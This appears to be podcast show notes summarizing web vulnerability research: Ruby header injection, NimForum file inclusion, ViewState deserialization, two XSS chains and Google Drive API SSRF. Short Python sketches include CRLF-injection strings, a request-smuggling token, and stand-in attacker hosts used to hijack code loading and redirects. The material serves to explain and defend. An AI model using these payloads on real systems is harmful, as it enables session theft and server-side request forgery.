Show Notes

117 - Hacking Google Drive Integrations and XSS Puzzles

Maybe an issue, maybe not; the Ruby devs seem to think it's a non-issue. This is a case of a library allowing some questionable input. The net/http library provides a set_content_type method which takes a mimetype and a dictionary of parameters. The dictionary is simply joined and reflected in the final Content-Type header as key=value pairs. An attacker who can control input to that dictionary can include newline characters and inject their own request headers.

This is a significant restriction for an attacker to be sure, but it also makes little sense for Ruby to include newline characters at all, even when they are passed in. While an actual vulnerability built on this is probably rare, it is a quirk that might pop up somewhere.
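To make the pattern concrete, here is a minimal Python sketch of the kind of naive dict-joining described above (the function name mirrors Ruby's API, but the logic is illustrative, not Ruby's actual implementation):

```python
# Sketch of a header builder that naively joins a params dict into the
# Content-Type header value (illustrative, not Ruby's real code).
def set_content_type(mimetype: str, params: dict) -> str:
    joined = "; ".join(f"{k}={v}" for k, v in params.items())
    return f"Content-Type: {mimetype}; {joined}"

# An attacker controlling a param value can embed CRLFs and smuggle in
# an entirely new header line:
header = set_content_type("text/plain", {"charset": "utf-8\r\nX-Injected: 1"})
```

The fix is simply to reject or encode CR/LF characters in header values before joining.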

A really straightforward bug: NimForum uses the rather feature-rich reStructuredText (RST) format for its user-generated content, which has an include directive that can be used to include local files. What is at least slightly interesting here is that the code's authors seemed aware of the potential vulnerabilities and included a couple of comments in the relevant code:

One comment reads: "The proc is meant to be used in online environments without access to a meaningful filesystem, and therefore rst include like directives won't work." And in myFindFile another comment indicates: "we don't find any files in online mode". Despite these reassuring comments, the include directive works just fine, and files will be found and included. Making matters a bit worse, even an admin who was aware of these risks from RST and might have disabled the include directive could have missed the fact that the code-blocks directive was customized to also include files.

I think this is just a nice example of how comments may not always reflect the ground truth of the code they live in. It might be that the code changed since the comment was written, or that the intent of the first comment was prescriptive (don't use this where there is access to a meaningful filesystem) rather than descriptive (it won't access the filesystem).
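As an illustration of why include is dangerous against untrusted input, here is a hypothetical Python sketch of a renderer that honors the directive (this is not NimForum's actual code, just the vulnerability class):

```python
import re

def render_includes(rst_source: str) -> str:
    """Naively expand RST-style include directives. Any renderer that does
    this against user-generated content is a local file disclosure."""
    def expand(match: re.Match) -> str:
        path = match.group(1).strip()
        with open(path) as f:  # attacker-chosen path
            return f.read()
    return re.sub(r"^\.\. include:: (.+)$", expand, rst_source, flags=re.M)
```

A user post containing `.. include:: /etc/passwd` would have the file's contents expanded straight into the rendered page.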

Once again, deserialization and RCE through an unprotected ViewState; it's kind of silly that this sort of issue continues to persist. The normal __VIEWSTATE field is used by some .NET applications to hold a ton of information about the current view state. It's rather large, and attackers tampering with it was a very common attack that has since been mitigated through integrity verification. Unfortunately, the issue lives on because some applications, in order to make the ViewState smaller, did their own wrapping around it so it could be gzipped to save data.

Those customized implementations did not get the "update" that introduced such fixes, and so they continue to serve up insecure ViewStates ready for attackers to abuse.
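The kind of custom wrapper described above is typically along these lines; a Python sketch under the assumption of a simple gzip-plus-base64 scheme (the real applications are .NET, and details vary):

```python
import base64
import gzip

def wrap_viewstate(raw_viewstate: bytes) -> str:
    """Custom 'compressed viewstate' wrapper: gzip then base64.
    Note there is no MAC/signature, so the contents are tamperable."""
    return base64.b64encode(gzip.compress(raw_viewstate)).decode()

def unwrap_viewstate(wrapped: str) -> bytes:
    # The server decompresses and then deserializes whatever it receives,
    # with no integrity check -- the bug class described above.
    return gzip.decompress(base64.b64decode(wrapped))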

We’ve got two XSS “puzzles” in unnamed bounty programs, each with somewhat interesting exploit strategies. The original post is worth a read for more insight into the thought process leading to the discovery of each step.

Puzzle 1

The first puzzle started off with a postMessage handler that did not perform any origin checking. It could be used to set the window.settingsSync value when the event's type was ChatSettings. In turn, the settingsSync values were used by some third-party code. Specifically, it could be triggered to make what seems like a "refresh settings" sort of request: it would figure out the subdomain for the user's region, POST to it, use the response as the new window.settingsSync, then load a JS file from CloudFront based on window.settingsSync.versionNumber, and finally pass window.settingsSync.config into an eval(...).

The region domain was based on window.settingsSync.region, so by using the first postMessage issue to change the region to a malicious value, they could have the domain resolve somewhere attacker-controlled, allowing arbitrary JavaScript to be passed into eval. Unfortunately, this executed in the context of CloudFront and not the original application.
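A stand-in for the message an attacker's page might post, expressed here as a Python dict for consistency (field names beyond type and settingsSync.region are assumptions based on the description):

```python
# Stand-in for the browser-side exploit message described above
# (field names are assumptions from the writeup, not confirmed).
exploit_message = {
    "type": "ChatSettings",  # the handler accepts this with no origin check
    "settingsSync": {
        "region": "evil.example",  # hypothetical attacker-controlled region
    },
}
# In the browser this would be delivered roughly as:
#   frame.postMessage(exploitMessage, "*")
# after which the app derives its settings endpoint from the region value.
```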

However, the original application did have another postMessage handler. This handler did perform origin checking, and it trusted the CloudFront domain. It would await an IframeLoaded event and then send back a "credentialConfig" which included sensitive information like the user's session token, enabling account hijacking.

Puzzle 2

The second puzzle starts off with a bit of a weird OAuth setup. Once you landed on the company path, the application would make a GET request; the returned page contained some of the standard OAuth provider data like logourl, name, and link. Of interest was the introduction field, which would be injected directly into the page, enabling XSS if an attacker could control the results.

Of course, an attacker could control the results, because the domain used for this GET request was taken from the URL of the original page (the domain query parameter). Unfortunately for the author, the page's Content-Security-Policy (CSP) prevented arbitrary page loads, but it did allow the company's site and a wildcard domain that is the root for a lot of AWS content, like S3 buckets. So an attacker could just host their attack on S3.

There was a second CSP issue: script-src was set to self or a wildcard. To get around this restriction, they utilized an open redirect on the company site. The site would ensure that the provided URL ended with an expected value; the problem was that it allowed newline characters, which browsers treat a bit differently. By including a URL-encoded newline character (%0a) in the subdomain, the browser would send the request off to the domain before the newline, while the newline and everything after it became part of the path, resulting again in XSS.
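A minimal Python sketch of that validation gap (the trusted suffix here is a placeholder, since the real value is not named in the writeup):

```python
from urllib.parse import unquote

TRUSTED_SUFFIX = "trusted.example"  # placeholder for the real suffix

def redirect_allowed(url: str) -> bool:
    # Naive server-side check: only looks at how the decoded string ends.
    return unquote(url).endswith(TRUSTED_SUFFIX)

payload = "https://attacker.example%0a.trusted.example"
# The server approves the redirect target...
allowed = redirect_allowed(payload)
# ...but a lenient client that cuts the authority at the raw newline
# would actually connect to attacker.example.
host_browser_connects_to = unquote(payload).split("\n")[0]
```

The mismatch between what the validator sees (one long string) and what the client parses (host terminated at the newline) is the whole bypass.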

The interesting part of this post is the use of an external API to achieve SSRF, specifically the Google Drive API.

It takes advantage of the fact that the API by default returns a JSON payload including a downloadURL, which users of the API then request to download the file itself. However, if one can include the alt=media query parameter and value in the request, rather than serving the metadata it will serve the file content itself. This allows an attacker to control the downloadURL that applications would trust, by uploading a file containing the relevant JSON.
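Roughly, the difference between the two requests looks like this (the v2-style path is an assumption for illustration; consult the Drive API docs for exact endpoints):

```python
file_id = "FILE_ID"  # placeholder

# Default: returns JSON metadata about the file, including a download URL
# that the consuming application will trust and fetch.
meta_url = f"https://www.googleapis.com/drive/v2/files/{file_id}"

# With alt=media: the same endpoint returns the raw file bytes instead,
# so an uploaded file containing forged metadata JSON (with an
# attacker-chosen download URL) is served as if it were the API's answer.
content_url = f"https://www.googleapis.com/drive/v2/files/{file_id}?alt=media"
```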

First Finding - Partial SSRF in Private Bounty

In this private application, the fileId field could be abused for path traversal on the Drive API to hit other API endpoints, but the main issue was a CRLF injection in the Authorization header, as the application would inject the attacker-controlled authorization token into that header. This was abused to inject two blank lines, leading the Google server into treating what followed as a second request, where the attacker controlled the entire request and could pull off the alt=media trick.
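A hypothetical reconstruction of what the injected token might have looked like (the path, host, and token value are illustrative):

```python
# The attacker-supplied "token" ends the first request with blank lines and
# then begins a second, fully attacker-controlled request (illustrative).
malicious_token = (
    "AAAA\r\n"
    "\r\n"
    "\r\n"  # blank lines: the server treats what follows as a new request
    "GET /drive/v2/files/FILE_ID?alt=media HTTP/1.1\r\n"
    "Host: www.googleapis.com\r\n"
)
header = "Authorization: Bearer " + malicious_token
```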

The result was an SSRF; however, as the downloaded file was parsed as a PPTX, the full contents could not be read.

Second Finding - Full-Read SSRF

We are not provided a lot of details here, just a link to the HackerOne report. Though I think the summary gives you a good idea of what happened.

This researcher pointed out that HelloSign's Google Drive doc export feature had a URL parsing issue that could allow extra parameters to be passed to the Google Drive API.